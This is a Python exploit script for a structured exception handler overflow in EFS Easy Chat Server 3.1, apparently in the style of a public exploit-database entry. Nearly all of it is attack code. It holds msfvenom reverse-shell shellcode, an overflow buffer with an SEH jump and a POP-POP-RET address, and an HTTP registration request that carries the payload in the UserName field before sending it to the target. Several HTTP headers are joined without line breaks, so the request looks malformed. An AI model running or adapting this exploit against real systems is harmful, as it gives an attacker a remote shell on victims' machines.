# EFS Easy Chat Server 3.1 SEH RCE
# Tested on windows 7

import socket
import struct

p32 = lambda x: struct.pack("I", x)

"""
msfvenom -p windows/shell_reverse_tcp lhost=127.0.0.1 \
lport=1024 -f python -v shellcode -b "\x00\x0a\x0d\x20\x40\x25\x26\x27\x2b"
"""

shellcode =  ""
shellcode += "\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
shellcode += "\x81\x76\x0e\x83\x8e\x96\xe4\x83\xee\xfc\xe2\xf4"
shellcode += "\x7f\x66\x14\xe4\x83\x8e\xf6\x6d\x66\xbf\x56\x80"
shellcode += "\x08\xde\xa6\x6f\xd1\x82\x1d\xb6\x97\x05\xe4\xcc"
shellcode += "\x8c\x39\xdc\xc2\xb2\x71\x3a\xd8\xe2\xf2\x94\xc8"
shellcode += "\xa3\x4f\x59\xe9\x82\x49\x74\x16\xd1\xd9\x1d\xb6"
shellcode += "\x93\x05\xdc\xd8\x08\xc2\x87\x9c\x60\xc6\x97\x35"
shellcode += "\xd2\x05\xcf\xc4\x82\x5d\x1d\xad\x9b\x6d\xac\xad"
shellcode += "\x08\xba\x1d\xe5\x55\xbf\x69\x48\x42\x41\x9b\xe5"
shellcode += "\x44\xb6\x76\x91\x75\x8d\xeb\x1c\xb8\xf3\xb2\x91"
shellcode += "\x67\xd6\x1d\xbc\xa7\x8f\x45\x82\x08\x82\xdd\x6f"
shellcode += "\xdb\x92\x97\x37\x08\x8a\x1d\xe5\x53\x07\xd2\xc0"
shellcode += "\xa7\xd5\xcd\x85\xda\xd4\xc7\x1b\x63\xd1\xc9\xbe"
shellcode += "\x08\x9c\x7d\x69\xde\xe6\xa5\xd6\x83\x8e\xfe\x93"
shellcode += "\xf0\xbc\xc9\xb0\xeb\xc2\xe1\xc2\x84\x71\x43\x5c"
shellcode += "\x13\x8f\x96\xe4\xaa\x4a\xc2\xb4\xeb\xa7\x16\x8f"
shellcode += "\x83\x71\x43\xb4\xd3\xde\xc6\xa4\xd3\xce\xc6\x8c"
shellcode += "\x69\x81\x49\x04\x7c\x5b\x01\x8e\x86\xe6\xe9\xe4"
shellcode += "\x83\x8f\xfe\xe6\x83\x8a\x96\x6d\x65\xe4\x86\xb2"
shellcode += "\xd4\xe6\x0f\x41\xf7\xef\x69\x31\x06\x4e\xe2\xe8"
shellcode += "\x7c\xc0\x9e\x91\x6f\xe6\x66\x51\x21\xd8\x69\x31"
shellcode += "\xeb\xed\xfb\x80\x83\x07\x75\xb3\xd4\xd9\xa7\x12"
shellcode += "\xe9\x9c\xcf\xb2\x61\x73\xf0\x23\xc7\xaa\xaa\xe5"
shellcode += "\x82\x03\xd2\xc0\x93\x48\x96\xa0\xd7\xde\xc0\xb2"
shellcode += "\xd5\xc8\xc0\xaa\xd5\xd8\xc5\xb2\xeb\xf7\x5a\xdb"
shellcode += "\x05\x71\x43\x6d\x63\xc0\xc0\xa2\x7c\xbe\xfe\xec"
shellcode += "\x04\x93\xf6\x1b\x56\x35\x66\x51\x21\xd8\xfe\x42"
shellcode += "\x16\x33\x0b\x1b\x56\xb2\x90\x98\x89\x0e\x6d\x04"
shellcode += "\xf6\x8b\x2d\xa3\x90\xfc\xf9\x8e\x83\xdd\x69\x31"

payload = "A" * 217
payload += "\xEB\x06\x90\x90" # JMP SHORT 0x0c -> seh 
payload += p32(0x10018aff)    # POP2RET -> nseh
payload += shellcode
payload += "B" * 200

buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
buffer += "Host: 192.168.1.11"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
buffer += "Accept-Language: en-US,en;q=0.5"
buffer += "Accept-Encoding: gzip, deflate"
buffer += "Referer: http://192.168.1.11/register.ghp"
buffer += "Connection: close"
buffer += "Content-Type: application/x-www-form-urlencoded"
buffer += "UserName=" + payload +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 80))

print "[+] Sending Payload! \n[+] You should have your shell!"
s.send(buffer)
s.close()
